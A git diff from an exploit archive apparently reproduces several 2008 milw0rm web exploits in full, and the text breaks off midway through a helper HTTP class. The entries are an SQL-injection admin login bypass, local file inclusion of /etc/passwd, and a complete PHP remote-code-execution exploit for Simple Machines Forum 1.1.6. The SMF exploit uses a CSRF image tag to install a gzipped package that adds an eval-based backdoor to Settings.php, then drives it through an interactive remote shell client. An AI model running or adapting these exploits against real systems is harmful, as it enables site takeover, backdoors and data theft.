+___________________________________________________________________________ + + Yuri // 04 - 11 - 2008 + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6989.txt b/platforms/php/webapps/6989.txt index 3eff7afb5..ce06527d8 100755 --- a/platforms/php/webapps/6989.txt +++ b/platforms/php/webapps/6989.txt 
@@ -1,16 +1,16 @@ --==============================- - Autore: x0r - Road Crew -Cms: WebbDomain Web Postcards -Bug: Auth ByPass -Site Of Seller: http://webbdomain.com - -==============================- -Exploit: http://webbdomain.com/php/postcarden/admin - -Username: admin ' or ' 1=1 -Pass: x0r - -Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php - -Greetz: La Mia Bimb4...8\10\08 Ti AmO - -# milw0rm.com [2008-11-04] +-==============================- + Autore: x0r - Road Crew +Cms: WebbDomain Web Postcards +Bug: Auth ByPass +Site Of Seller: http://webbdomain.com + -==============================- +Exploit: http://webbdomain.com/php/postcarden/admin + +Username: admin ' or ' 1=1 +Pass: x0r + +Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php + +Greetz: La Mia Bimb4...8\10\08 Ti AmO + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6990.txt b/platforms/php/webapps/6990.txt index 4cf22bfd2..117ce723b 100755 --- a/platforms/php/webapps/6990.txt +++ b/platforms/php/webapps/6990.txt 
@@ -1,24 +1,24 @@ -# ------------------------------------------------------------ -# Sito includefile in PHP Local File Inclusion Vulnerabilities -# ------------------------------------------------------------ -# Discovered By StAkeR[at]hotmail[dot]it -# Download On http://www.niclor.net/prodotti/include_Sito_PHP/include_Sito_PHP.zip -# ----------------------------------------------------------- - -# File (includefile.php) -# Register Globals On -1. - -# includefile.php?page=athos&page_file=../../../../../../etc/passwd - -# File (index.php) -# Magic_Quotes_GPC -# index.php?id=../../../../../etc/passwd%00 - -# milw0rm.com [2008-11-04] +# ------------------------------------------------------------ +# Sito includefile in PHP Local File Inclusion Vulnerabilities +# ------------------------------------------------------------ +# Discovered By StAkeR[at]hotmail[dot]it +# Download On http://www.niclor.net/prodotti/include_Sito_PHP/include_Sito_PHP.zip +# ----------------------------------------------------------- + +# File (includefile.php) +# Register Globals On +1. + +# includefile.php?page=athos&page_file=../../../../../../etc/passwd + +# File (index.php) +# Magic_Quotes_GPC +# index.php?id=../../../../../etc/passwd%00 + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6991.txt b/platforms/php/webapps/6991.txt index fe39c16ea..b3b1545fb 100755 --- a/platforms/php/webapps/6991.txt +++ b/platforms/php/webapps/6991.txt 
@@ -1,94 +1,94 @@ - -# URL: http://real.olympe-network.com/ -# -# Note: other versions are maybe vulnerable, not tested. -# -# SMF suffers from multiples vulnerabilities. -# Combining some of them, we can obtain a remote code execution on the -# remote host. I won't talk here about all of them, but I'll explain -# how we can execute code. -# -# 0 - UPDATE (05/11/08) -# -# (Now,) SMF seems to replace "action=" by "action-" in every URL. -# But SMF urldecode() GET data, so I replaced "action" by "%61ction". -# Other little problems have been corrected. -# -# Thanks to Alessandro Tagliapietra for his report and his patience. -# -# It seems that many people can't use phpreter, so here is a little course : -# -# phpreter have 3 modes : cmd (bash), php, and SQL -# -# To switch to a mode just type "mode=" (replace by php, cmd or sql) -# -# In cmd mode, you can run bash commands, like "ls" -# In php mode, you can exec php code like "echo 'abc';" -# In sql mode, you can exec sql queries and view results, try "SHOW TABLES" -# -# I - Session Code -# -# SMF administration panel is secured by a "session code", a kind of -# password that must be provided by the admin browser when the admin -# is editing data. -# -# But the session code is not required for SMF package installation. -# Just to be clear : you don't need the "session code" to install the -# package, but you do need a valid admin session. -# -# II - Package Installation -# -# Package installation works this way : -# - The admin tells an archive file, which can be either gzip or zip, to SMF -# - SMF un(g)zip it, and analyse the XML files (yes, it work with XML) -# to add, replace or remove code from any SMF source code file. 
-# -# To precise an archive to SMF, the admin is supposed to go on this URL : -# -# http://[website]/SMF/index.php?action=packages;sa=install2;package=[filename] (1) -# -# Since $_REQUEST['package'] is not checked, we can install any file -# on the server, even if the file is not in the Packages/ dir. -# -# Using CSRF, we can make an admin to install whatever package we want. -# That does not seem really interesting for now, but be patient =) -# -# III - File upload in SMF; Attachments -# -# SMF let users upload files in two cases : -# - You can upload an image to be your avatar -# - You can upload attachments to every post you submit -# -# Since uploaded images are checked, they don't interest us for now. -# -# Attachments are not checked by SMF. -# They are renamed and moved to the attachments/ directory. -# They are renamed this way : -# [id]_[name]_[ext][md5([name].[ext])] -# -# As you can see, there is no rand(), or other strange stuff : -# we can easily find attachment name. -# -# The second part is more interesting now, no ? -# -# Now, we can submit a post with a gzip'ed attachment, and make the admin -# click on a specific link, to install a package we uploaded ourself. -# -# I writed "click", so many of you may say "brr, that sucks". -# So here come the wait-I've-not-finished part. -# -# IV - Wait-I've-not-finished part -# -# SMF allows us to display remote images in our posts, using [img][/img] -# We can just set our image URL to ... (1) : when the admin will see our post, -# the package will be installed. -# -# V - Classic Scenario -# -# 1. We submit a fantastic post containing our nasty-attached-gzip'ed package, ready -# to be installed. -# 2. We guess the attachment name, that's pretty easy because we can retrieve the -# attachment ID. -# 3. We modify our post, adding an [img](1)[/img], replacing [filename] by -# ../attachments/[the_name_you_just_found] -# 4. The administrator discover our fantastic post on his fantastic forum ... -# 5. 
His browser discovers our image : it goes to the specified url to download it. -# wooops. The package is installed. -# -# VI - Exploit -# -# The exploit will login with your user account, and submit a new post/topic containing an -# attachment, a gzipped package, which permits remote code execution once installed. -# Then it will obtain the attachment ID, determine attachment name, and modify your topic to -# add a remote image (using [img][/img]). -# Then you'll have to wait for an admin to see your post ... and the package will be installed. -# -# VII - Notes -# -# - Do not forget to change SUBJECT and MESSAGE constants, to make your post a little more realistic. -# - The current gzipped package is supposed to put PHP code at the end of Settings.php file. -# - Code: if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); } -# -# First run the exploit like this : -# eg : php exploit.php -url http://localhost/forum/ -bid 2 -user tester:passwd -# And when you think the admin viewed your post, run the shell :) -# eg : php exploit.php -url http://localhost/forum/ -shell -# -# FOR EDUCATIONAL PURPOSE ONLY -# - -new smf_poc(); - -class smf_poc -{ - const SUBJECT = 'hello'; - const MESSAGE = 'dudes ... I love your forum ;)'; - - function smf_poc() - { - $this->header(); - $this->gzip(); - $this->loadparameters(); - $this->wwwinit(); - - if(!$this->shell) - { - # First of all, login - $this->login(); - # Then submit a topic - $this->submit_post(); - # Find attachment name and message id - $this->get_postinfo(); - # and modify the post - $this->edit_post(); - # finally ... wait. - $this->wait(); - } - else - $this->shell(); - } - - function header() - { - $this->msg(); - $this->msg(' Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit'); - $this->msg(' by Charles FOL '); - $this->msg(); - } - - function msg($msg = '', $exit = 0) - { - print '# ' . $msg . 
"\n"; - - if($exit) - { - $this->msg(); - exit(); - } - } - - function usage() - { - global $argv; - - $name = basename($argv[0]); - - $this->msg('usage : php ' . $name . ' -url [url] -bid [bid] -user [user]:[passwd]'); - $this->msg(' OR php ' . $name . ' -url [url] -shell'); - $this->msg(); - $this->msg('Parameters are :'); - $this->msg(' -shell Test if the shell is installed, and load phpreter'); - $this->msg(' -bid (int) The board ID were you want to submit the topic'); - $this->msg(' -user user:passwd A valid user:password couple'); - $this->msg(' -wait Flood control time (default: 5)'); - $this->msg(); - $this->msg('eg : php ' . $name . ' -url http://localhost/forum/ -bid 2 -user tester:passwd', 1); - } - - # Get every needed parameters, and load defaults - function loadparameters() - { - $this->furl = $this->getparameter('url'); - $this->shell = $this->getoption('shell'); - $this->wait = $this->getparameter('wait', 5); - - if(!$this->shell) - { - $this->bid = $this->getparameter('bid'); - $this->user = $this->getparameter('user'); - } - } - - # Patience ... - function wait() - { - $this->url->topic = $this->pid; - $this->makeurl(); - - $this->msg(); - $this->msg('Now, you just have to wait for an admin to see your post,'); - $this->msg('then you will be able to launch a shell using -shell.'); - $this->msg(); - $this->msg('Post URL : ' . 
$this->murl, 1); - } - - # Check if a shell is available and launch phpreter - function shell() - { - $this->www->addheader('Shell', 'MTs='); - - $this->url->action = 'forum'; - $this->get(); - - if(!$this->match('(12345678901234567890)')) - $this->msg('Shell is not available', -1); - - $sql = array - ( - 'var_host' => '$db_server', - 'var_user' => '$db_user', - 'var_passwd' => '$db_passwd', - 'var_db' => '$db_name' - ); - - $preter = new phpreter($this->murl, '1234567890(.*)1234567890', 'cmd', $sql); - } - - function wwwinit() - { - $this->www = new phpsploit(); - $this->www->cookiejar(1); - $this->www->addheader('Referer', $this->furl . 'index.php'); - } - - # Log in ... - function login() - { - $user = explode(':', $this->user); - - $this->url = 'action=login2'; - $this->data = 'user='.$user[0].'&passwrd='.$user[1].'&cookielength=-1'; - $this->post(); - - $this->location->action = 'login2'; - $this->location->sa = 'check'; - - if($this->location()) - $this->msg('Logged in as ' . $user[0]); - else - $this->msg('Can\'t log in', 1); - } - - # Get seqnum and sescode - function get_sessionvars() - { - $this->get(); - - $this->scode = $this->match('name="sc" value="([0-9a-f]+)"', 1); - $this->sqnum = $this->match('name="seqnum" value="([0-9]+)"', 1); - } - - # Submit our post, containing our gzipped package - function submit_post() - { - # Flood control: let's sleep a little - - $this->msg('Waiting ' . $this->wait . ' secs (flood control)'); - sleep($this->wait); - - # Obtain session vars - - $this->url->action = 'post'; - $this->url->board = $this->bid . 
'.0'; - - $this->get_sessionvars(); - - # and submit the post - - $this->url->action = 'post2'; - $this->url->board = $this->bid; - $this->url->start = '0'; - - $this->data = array - ( - 'subject' => self::SUBJECT, - 'message' => self::MESSAGE, - 'sc' => $this->scode, - 'seqnum' => $this->sqnum, - 'icon' => 'xx', - 'topic' => 0, - 'notify' => 0, - 'lock' => 0, - 'sticky' => 0, - 'move' => 0, - 'additional_options' => 0, - 'attachment[]' => array - ( - frmdt_filename => 'jpeg.jpg', - frmdt_type => 'image/jpeg', - frmdt_content => $this->GZIP, - ) - ); - - $this->post(); - - # Check the submission - - $this->location->board = $this->bid; - - if($this->location()) - { - $this->msg('Post successfully submitted'); - } - else - { - $this->msg('Error while posting'); - $this->msg('Try augmenting -wait parameter', 1); - } - - # Find the post id - - $this->url->board = $this->bid . '.0'; - $this->get(); - - $this->pid = $this->match('topic=([0-9]+)'); - $this->pid = max($this->pid); - } - - # Get the avatar ID to obtain its full name, and get msg id - function get_postinfo() - { - $this->url->topic = $this->pid . '.0'; - $this->get(); - - $this->aid = $this->match('attach=([0-9]+)', 1); - $this->mid = $this->match('msg=([0-9]+)', 1); - - if($this->aid) - $this->msg('Got attachment name =)'); - else - $this->msg('Unable to obtain attachment ID ...', 1); - - if(!$this->mid) - $this->msg('Unable to obtain message ID ...', 1); - } - - # Edit our precedent post : just add our "image". - function edit_post() - { - # Obtain session vars - - $this->url->action = 'post'; - $this->url->topic = $this->pid; - $this->url->msg = $this->mid; - $this->url->sesc = $this->scode; - - $this->get_sessionvars(); - - # Build our CSRF - - $this->url->{'%61ction'} = 'packages'; - $this->url->sa = 'install2'; - $this->url->package = $this->aid . '_jpeg_jpg' . md5('jpeg.jpg'); - $this->url->package = '../attachments/' . $this->url->package; - - $this->makeurl(); - - $img = '[img]' . $this->murl . 
'[/img]'; - - # Edit the post - - $this->url->action = 'post2'; - $this->url->sesc = $this->scode; - $this->url->board = $this->bid; - $this->url->msg = $this->mid; - $this->url->start = 0; - - $this->data = array - ( - 'topic' => $this->pid, - 'subject' => self::SUBJECT, - 'icon' => 'xx', - 'message' => self::MESSAGE . $img, - 'notify' => '0', - 'lock' => '0', - 'goback' => '1', - 'sticky' => '0', - 'move' => '0', - 'attach_del[]' => '0', - 'attach_del[]' => $this->aid, - 'post' => 'Save', - 'num_replies' => '0', - 'additional_options' => '0', - 'sc' => $this->scode, - 'seqnum' => $this->sqnum, - ); - - $this->post(); - - if($this->location(';topic=' . $this->pid)) - $this->msg('Post successfully edited, everything done.'); - else - $this->msg('Unable to edit the post'); - } - - # Find were we are redirected to - function location() - { - # SMF likes making a mess with URL, so ... let's consider - # all cases. - - $expr = ''; - - $this->location = (array) $this->location; - - foreach($this->location as $key => $value) - { - $expr .= $key . '[,=]' . urlencode($value) . '(&|;|%26|%3B)'; - } - - $this->location = null; - - $expr = substr($expr, 0, -13); - $expr = '#(Refresh|Location):.*' . $expr . '#i'; - - $head = $this->www->getheader(); - - return preg_match($expr, $head); - } - - function match($expr, $one = 0) - { - # SMF likes making a mess with URL, so ... let's consider - # all cases. - - $expr = str_replace('\?', '[\?/]', $expr); - $expr = str_replace('=', '[,=]', $expr); - $expr = str_replace(';', '(&|;|%26|%3B)', $expr, $count); - $expr = '#' . $expr . '#is'; - - $count++; - - $http = $this->www->getcontent(); - - if(!$one && !preg_match_all($expr, $http, $match)) - return false; - - if($one && !preg_match($expr, $http, $match)) - return false; - - return $match[$count]; - } - - function getoption($option) - { - global $argv, $argc; - - foreach($argv as $arg) - { - if($arg == '-' . 
$option) - return true; - } - - return false; - } - - function getparameter($parameter, $default = false) - { - global $argv, $argc; - - for($i=0;$i<$argc;$i++) - { - if($argv[$i] == '-' . $parameter) - return $argv[$i+1]; - } - - if($default === false) - $this->usage(); - - return $default; - } - - function get() - { - $this->makeurl(); - $this->www->get($this->murl); - } - - function post() - { - $this->makeurl(); - - if(is_array($this->data)) - { - $this->data['frmdt_url'] = $this->murl; - - $this->www->formdata($this->data); - } - else - $this->www->post($this->murl, $this->data); - } - - # Construct a valid URL using the url object/string. - function makeurl() - { - $url = ''; - - if(is_object($this->url)) - { - $url = ''; - - $this->url = (array) $this->url; - - foreach($this->url as $key => $value) - { - $url .= $key . '=' . urlencode($value) . '&'; - } - - $url = substr($url, 0, -1); - } - else - $url = $this->url; - - $url = $this->furl . 'index.php?' . $url; - - $this->murl = $url; - - $this->url = null; - } - - # Our SMF package ... - function gzip() - { - $this->GZIP = '' - . "\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x0b\xed\x56\xff\x4f" - . "\xda\x40\x14\xe7\x57\x4c\xfc\x1f\x9e\x64\x89\x98\x08\x6d" - . "\x01\xcb\x86\xa5\xc6\x29\x8b\x26\x7e\x8b\x34\x4b\x8c\x31" - . "\xe4\xa0\x87\xdc\x6c\xef\x9a\xde\x21\x92\x65\xff\xfb\xde" - . "\x5d\x71\x52\xdd\x37\x12\x37\x17\xc7\xa3\x69\xb9\xbb\xf7" - . "\x5e\xdf\xd7\xcf\x2b\xe3\x52\x91\x28\xaa\xde\xc5\x51\xe1" - . "\x4f\x91\x63\xdb\xae\xeb\x42\xc1\x36\xf4\xf0\x84\x8c\x6a" - . "\x8d\xad\x26\x38\x8e\x63\xd7\xeb\x76\xdd\x6d\xd6\x00\x1c" - . "\xdb\x6d\x3a\x50\xf8\x2b\x34\x46\xff\x53\x34\x29\x15\x42" - . "\x15\xfe\x3f\xf2\x76\x30\xf3\x70\x4b\x53\xc9\x04\x6f\x97" - . "\x9c\xaa\x5d\xda\xf1\x57\x57\xbc\xb5\xfd\xd3\xbd\xe0\xe2" - . "\xac\x03\xb1\x08\xd9\x90\x0d\x88\xc2\x73\xe8\x5e\x74\x83" - . "\xce\x31\x94\x46\x4a\x25\x2d\xcb\x9a\x4c\x26\x55\xc9\xe2" - . "\x24\xa2\x31\x19\x8c\x18\xa7\xb2\x2a\xd2\x6b\x0b\x35\x5a" - . 
"\xf3\x62\x25\xa3\xb0\x52\x81\x67\xfc\xad\xae\x14\x83\x11" - . "\x93\x80\x17\xe1\x40\xef\x88\xb6\x22\x6f\xec\x90\xe1\xce" - . "\x50\xa4\xd0\x3d\xfe\x00\x09\x19\xdc\x90\x6b\x34\x70\x75" - . "\x05\x45\x77\x83\xa0\x73\x12\x1c\x9e\x9e\xb4\xe0\x70\x08" - . "\x53\x31\x06\x92\x52\x50\xe9\x94\xf1\x6b\x50\x02\x58\xd6" - . "\x15\xa0\xf4\x2b\x62\xc2\xc7\xb8\x98\x6e\x1a\x46\x39\x12" - . "\xe3\x28\xd4\xbc\xa8\x47\x8d\xe8\xbd\x66\xcd\x86\x8f\xb4" - . "\x0a\x5a\x25\x53\x30\x61\xa8\x80\x0b\xfc\x23\xd2\x1b\x63" - . "\x07\x8a\x6f\x02\x9a\x49\x24\xbe\x8b\xdc\x50\x20\x10\x09" - . "\x71\x83\x7a\x88\x02\xad\x6a\x28\xa2\x48\x4c\xb4\x0d\x9a" - . "\x9d\x71\xbc\xc7\x99\x2f\x78\x19\x5b\xb2\x9d\x16\x8a\x14" - . "\x67\x39\x40\x97\xe5\xf7\x92\x10\x8a\x81\xb4\x32\xd3\x2b" - . "\x33\x77\xaa\xc9\x28\xd1\xee\xb7\x9f\x99\x4c\x48\x8f\x1f" - . "\x87\x5e\xc2\x00\x33\xd3\xa7\x30\x96\x34\xd4\x41\x35\xc9" - . "\x99\xce\xce\xa4\x40\x87\x32\xb7\xa7\x10\x0a\x98\xe0\x02" - . "\xb5\x60\x88\xd2\x6f\x11\xe5\x94\x86\x52\x73\xc4\x5a\x1c" - . "\x99\xf0\x6e\x82\x99\xa4\x22\xa1\x69\x34\x35\xc9\x84\x67" - . "\xad\xab\x8a\xaf\x75\x7a\xb9\x42\xc2\x7a\xe6\xb2\xbd\x68" - . "\xd1\x67\x62\x2d\x19\x0f\x7f\x25\xaa\xfb\xa3\x68\x1a\x24" - . "\x2b\xe9\xb9\xbc\xcf\x42\x20\x74\x1c\x75\x85\x48\x12\x63" - . "\xd9\xc8\x2c\x76\x8c\xc3\x5c\x01\x56\xb4\x9c\xc6\xf1\x6a" - . "\xe6\x45\xd1\x63\xa1\xdf\x27\xfd\x4f\x63\xc9\x5a\x7d\xc2" - . "\x39\x0d\x7b\x31\x8d\xfb\xd8\xea\x3d\x72\x4b\x10\xf5\x3c" - . "\x0b\x39\x34\xe3\xac\xfd\x7d\xbb\xea\x78\xd6\xfd\xc2\x64" - . "\xd5\x33\x4d\xc4\xf1\xad\xed\x52\x97\x2a\x85\xb5\x29\x75" - . "\x19\x19\x93\x8b\x9e\x4e\x83\x31\xd4\x2c\x8b\x9e\xa4\x24" - . "\x1d\x8c\x20\x11\x92\x29\x83\x27\x94\x87\x25\xb0\x66\xa7" - . "\x24\x0c\x7d\x6f\xed\x72\x6f\x7f\x37\xd8\xbd\x34\x5b\x6c" - . "\x58\x66\x52\x52\x55\x7e\xd3\xeb\x76\xce\x3f\x76\xce\x2f" - . "\xd7\x0f\x82\xe0\xac\xd7\x3d\xe8\x1c\x1d\xad\x5f\x6d\x6c" - . "\xc0\x67\x4c\x36\xe3\x0a\x9c\x5a\xbd\xb1\xe5\x36\xdf\xbe" - . 
"\xb3\xb7\xe9\x2d\x89\xca\x7d\x6c\x22\xb7\xd1\x0b\xe9\x40" - . "\x84\xf4\x87\xe2\xdb\x4f\x85\xef\x98\x2a\x6f\x6c\xc3\x97" - . "\xab\x2b\xdf\xb3\xb4\x45\xc6\x11\x2b\xe7\x89\x67\x69\xb7" - . "\x35\x6a\xe5\x52\x8a\x1b\xaf\x0e\xff\x1f\x17\xcf\x0b\xcc" - . "\x7f\x70\xdd\x7a\x36\xff\x1d\xd7\x75\xec\x06\xce\x7f\x67" - . "\xab\xb6\x9c\xff\xff\xc6\xfc\x9f\x2f\x90\x05\xe6\xff\xbc" - . "\x98\x99\xff\x39\x3d\xbf\x8d\xa8\x39\x35\x8b\x22\xaa\x86" - . "\x2d\xff\xbd\x41\x3e\x98\x21\x1f\xdc\x23\x9f\x39\x5b\x08" - . "\x24\xd5\x34\xa1\xfe\x3c\x1c\x78\x96\xd9\xfa\x09\x80\xa2" - . "\xf6\x6c\xf2\x66\x20\x93\xc3\x12\xf6\xf0\xe1\xfd\x04\x65" - . "\x10\x80\x1e\x04\xbd\x5c\x10\x5e\x23\x06\x2d\x69\x49\x4b" - . "\x7a\x19\xfa\x0a\x12\x1a\xc6\x57\x00\x10\x00\x00"; - } -} - -/* - * Copyright (c) Charles FOL - * - * TITLE: PHPreter - * AUTHOR: Charles FOL - * VERSION: 1.3 - * LICENSE: GNU General Public License - * - */ - -class phpreter -{ - var $url; - var $host; - var $port; - var $page; - - var $mode; - - var $ssql; - - var $prompt; - var $phost; - - var $expr; - var $data; - - /** - * __construct() - * - * @param url The url of the remote shell. - * @param expr The regular expression to catch cmd result. - * @param mode Mode: php, sql or cmd. - * @param sql An array with the file to include, - * and sql vars - * @param clear Determines if clear() is called - * on startup - */ - function phpreter($url, $expr='^(.*)$', $mode='cmd', $sql=array(), $clear=false) - { - $this->url = $url; - $this->expr = '#' . $expr . '#is'; - - # - # Set data - # - - $infos = parse_url($this->url); - $this->host = $infos['host']; - $this->port = isset($infos['port']) ? 
$infos['port'] : 80; - $this->page = $infos['path']; - - # www.(site).com - $host_tmp = explode('.', $this->host); - $this->phost = $host_tmp[ count($host_tmp)-2 ]; - - # Set up MySQL connection string - $this->set_ssql($sql); - - # Switch to default mode - $this->setmode($mode); - - # - # Main Loop - # - - if($clear) - $this->clear(); - - print $this->prompt; - - while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) ) - { - # change mode - if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i', $cmd, $array)) - $this->setmode($array[3]); - - # clear data - elseif(preg_match('#^clear$#i', $cmd)) - $this->clear(); - - # else - else print $this->exec($cmd); - - print $this->prompt; - } - } - - /** - * set_ssql() - * Build $ssql var - */ - function set_ssql($sql) - { - $this->ssql = ''; - - $sql = (object) $sql; - - # is there something to include ? - - if(isset($sql->include)) - $this->ssql .= 'include(\'' . $sql->include . '\');'; - - # mysql_connect: host, user, passwd - - $this->ssql .= 'mysql_connect('; - - foreach(array('host', 'user', 'passwd') as $key) - { - if(isset($sql->{'var_' . $key})) - { - $this->ssql .= $sql->{'var_' . $key} . ','; - } - else - { - $this->ssql .= "'" . $sql->{$key} . "',"; - } - } - - $this->ssql = substr($this->ssql, 0, -1); - $this->ssql .= ');'; - - # mysql_select_db - - if(isset($sql->var_db)) - $this->ssql .= 'mysql_select_db(' . $sql->var_db . ');'; - elseif(isset($sql->db)) - $this->ssql .= 'mysql_select_db(\'' . $sql->db . 
'\');'; - - # basic display for mysql results - - $this->ssql .= '$s=str_repeat(\'-\',50)."\n";'; - $this->ssql .= '$q=mysql_query(\'\') or print($s.mysql_error()."\n");'; - $this->ssql .= 'print $s;'; - $this->ssql .= 'if($q)'; - $this->ssql .= '{'; - $this->ssql .= 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'; - $this->ssql .= '{'; - $this->ssql .= 'foreach($r as $k=>$v) print " ".$k.str_repeat(\' \', 20-strlen($k))."| $v\n";'; - $this->ssql .= 'print $s;'; - $this->ssql .= '}'; - $this->ssql .= '}'; - } - - /** - * clear() - * Clear ouput, printing "\n"x50 - */ - function clear() - { - print str_repeat("\n", 50); - return 0; - } - - /** - * setmode() - * Set mode (PHP, CMD, SQL) - */ - function setmode($newmode) - { - $this->mode = strtolower($newmode); - $this->prompt = '['.$this->phost.']['.$this->mode.']# '; - - switch($this->mode) - { - case 'cmd': - $this->data = 'system(\'\');'; - break; - case 'php': - $this->data = ''; - break; - case 'sql': - $this->data = $this->ssql; - break; - } - - return $this->mode; - } - - /** - * exec() - * Execute any query and catch the result. - */ - function exec($cmd) - { - if($this->data != '') - $shell = str_replace('', addslashes($cmd), $this->data); - else - $shell = $cmd; - - $shell = base64_encode($shell); - - $packet = "GET " . $this->page . " HTTP/1.1\r\n"; - $packet .= "Host: " . $this->host . ( $this->port != 80 ? ':' . $this->port : '' ) . 
"\r\n"; - $packet .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; - $packet .= "Shell: $shell\r\n"; - $packet .= "Connection: close\r\n\r\n"; - - $fp = fsockopen($this->host, $this->port, $errno, $errstr, 30); - - fputs($fp, $packet); - - $recv = ''; - - while(!feof($fp)) - $recv .= fgets($fp, 128); - - fclose($fp); - - # Remove headers - $data = explode("\r\n\r\n", $recv); - $headers = array_shift($data); - $content = implode("\r\n\r\n", $data); - - # Unchunk content - if(preg_match("#Transfer-Encoding:.*chunked#i", $headers)) - $content = $this->unchunk($content); - - # Find results - preg_match($this->expr, $content, $match); - - $match = $match[1]; - - # Add a \n if there is not - if(substr($match, -1) != "\n") - $match .= "\n"; - - return $match; - } - - /** - * unchunk() - * Remove chunked content's sizes which are put by the apache - * server when it uses chunked transfert-encoding. - */ - function unchunk($data) - { - $dsize = 1; - $offset = 0; - - while($dsize>0) - { - $hsize_size = strpos($data, "\r\n", $offset) - $offset; - - $dsize = hexdec(substr($data, $offset, $hsize_size)); - - # Remove $hsize\r\n from $data - $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); - - $offset += $dsize; - - # Remove the \r\n before the next $hsize - $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); - } - - return $data; - } -} - -/* - * - * Copyright (C) darkfig - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - * - * TITLE: PhpSploit Class - * REQUIREMENTS: PHP 4 / PHP 5 - * VERSION: 2.0 - * LICENSE: GNU General Public License - * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt - * FILENAME: phpsploitclass.php - * - * CONTACT: gmdarkfig@gmail.com (french / english) - * GREETZ: Sparah, Ddx39 - * - * DESCRIPTION: - * The phpsploit is a class implementing a web user agent. - * You can add cookies, headers, use a proxy server with (or without) a - * basic authentification. It supports the GET and the POST method. It can - * also be used like a browser with the cookiejar() function (which allow - * a server to add several cookies for the next requests) and the - * allowredirection() function (which allow the script to follow all - * redirections sent by the server). It can return the content (or the - * headers) of the request. Others useful functions can be used for debugging. - * A manual is actually in development but to know how to use it, you can - * read the comments. 
- * - * CHANGELOG: - * - * [2007-06-10] (2.0) - * * Code: Code optimization - * * New: Compatible with PHP 4 by default - * - * [2007-01-24] (1.2) - * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) - * * New: multipart/form-data enctype is now supported - * - * [2006-12-31] (1.1) - * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) - * * New: You can now call the getheader() / getcontent() function without parameters - * - * [2006-12-30] (1.0) - * * First version - * - */ - -class phpsploit -{ - var $proxyhost; - var $proxyport; - var $host; - var $path; - var $port; - var $method; - var $url; - var $packet; - var $proxyuser; - var $proxypass; - var $header; - var $cookie; - var $data; - var $boundary; - var $allowredirection; - var $last_redirection; - var $cookiejar; - var $recv; - var $cookie_str; - var $header_str; - var $server_content; - var $server_header; - - - /** - * This function is called by the - * get()/post()/formdata() functions. - * You don't have to call it, this is - * the main function. - * - * @access private - * @return string $this->recv ServerResponse - * - */ - function sock() - { - if(!empty($this->proxyhost) && !empty($this->proxyport)) - $socket = @fsockopen($this->proxyhost,$this->proxyport); - else - $socket = @fsockopen($this->host,$this->port); - - if(!$socket) - die("Error: Host seems down"); - - if($this->method=='get') - $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; - - elseif($this->method=='post' or $this->method=='formdata') - $this->packet = 'POST '.$this->url." 
HTTP/1.1\r\n"; - - else - die("Error: Invalid method"); - - if(!empty($this->proxyuser)) - $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; - - if(!empty($this->header)) - $this->packet .= $this->showheader(); - - if(!empty($this->cookie)) - $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; - - $this->packet .= 'Host: '.$this->host."\r\n"; - $this->packet .= "Connection: Close\r\n"; - - if($this->method=='post') - { - $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data."\r\n"; - } - elseif($this->method=='formdata') - { - $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data; - } - - $this->packet .= "\r\n"; - $this->recv = ''; - - fputs($socket,$this->packet); - - while(!feof($socket)) - $this->recv .= fgets($socket); - - fclose($socket); - - if($this->cookiejar) - $this->getcookie(); - - if($this->allowredirection) - return $this->getredirection(); - else - return $this->recv; - } - - - /** - * This function allows you to add several - * cookies in the request. - * - * @access public - * @param string cookn CookieName - * @param string cookv CookieValue - * @example $this->addcookie('name','value') - * - */ - function addcookie($cookn,$cookv) - { - if(!isset($this->cookie)) - $this->cookie = array(); - - $this->cookie[$cookn] = $cookv; - } - - - /** - * This function allows you to add several - * headers in the request. 
